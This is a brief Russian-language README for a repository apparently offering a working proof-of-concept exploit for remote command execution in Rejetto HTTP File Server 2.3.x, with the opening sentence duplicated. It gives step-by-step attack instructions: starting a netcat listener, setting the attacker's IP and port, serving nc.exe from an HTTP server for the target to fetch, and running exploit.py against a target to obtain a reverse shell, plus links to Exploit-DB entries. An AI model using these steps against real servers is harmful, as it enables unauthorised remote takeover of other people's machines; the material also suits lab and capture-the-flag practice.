
Этот репозиторий содержит подробное объяснение и рабочий poc для Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution.
Этот репозиторий содержит подробное объяснение и рабочий PoC для Rejetto HTTP File Server (HFS) 2.3.x — удаленное выполнение команд.
Создайте netcat‑слушатель.
nc -lnvp 1234
Измените IP‑адрес атакующего на свой IP‑адрес и порт.

Также создайте HTTP‑файловый сервер в той же директории, где находится nc.exe.
python -m http.server 80
python exploit.py <target-ip> <target-port>

Примечание: Возможно, потребуется запустить полезную нагрузку несколько раз, чтобы получить обратную оболочку.
https://www.exploit-db.com/exploits/39161
https://www.exploit-db.com/exploits/34668
https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/